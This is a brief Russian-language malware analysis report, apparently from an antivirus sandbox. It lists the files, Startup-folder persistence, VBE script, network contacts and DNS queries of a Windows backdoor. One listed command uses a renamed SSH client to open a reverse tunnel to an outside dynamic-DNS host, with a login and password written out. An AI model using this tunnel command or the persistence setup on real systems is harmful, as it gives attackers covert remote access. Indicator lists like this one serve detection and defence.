Техническая информация
- %HOMEPATH%\Start Menu\Programs\Startup\DiskDoctor.lnk
- C:\Recycle.Msi\System.exe -ssh -R 60462:127.0.0.1:2103 trustme.zapto.org -l user3 -pw 2n1612
- C:\Recycle.Msi\cssrs.exe -d -t -l -e0.0.0.0 -i127.0.0.1 -p2103 -a
- <SYSTEM32>\wscript.exe "C:\Recycle.Msi\alg.vbe"
- C:\Recycle.Msi\DiskDoctor.lnk
- C:\Recycle.Msi\System.exe
- %HOMEPATH%\Local Settings\Temporary Internet Files\Content.IE5\69I9OPW5\boat5621[1]
- <LS_APPDATA>\PUTTY.RND
- C:\Recycle.Msi\cssrs.exe
- %TEMP%\$inst\temp_0.tmp
- %TEMP%\$inst\2.tmp
- C:\Recycle.Msi\boat5621.url
- C:\Recycle.Msi\alg.vbe
- %TEMP%\$inst\2.tmp
- %TEMP%\$inst\temp_0.tmp
- 's1###.#hotobucket.com':80
- 'localhost':1039
- 'tr####e.zapto.org':22
- s1###.#hotobucket.com/albums/ff500/boat5621/?st#######
- DNS ASK s1###.#hotobucket.com
- DNS ASK tr####e.zapto.org
- ClassName: 'MS_AutodialMonitor' WindowName: ''
- ClassName: 'MS_WebcheckMonitor' WindowName: ''
- ClassName: 'Shell_TrayWnd' WindowName: ''
- ClassName: '' WindowName: ''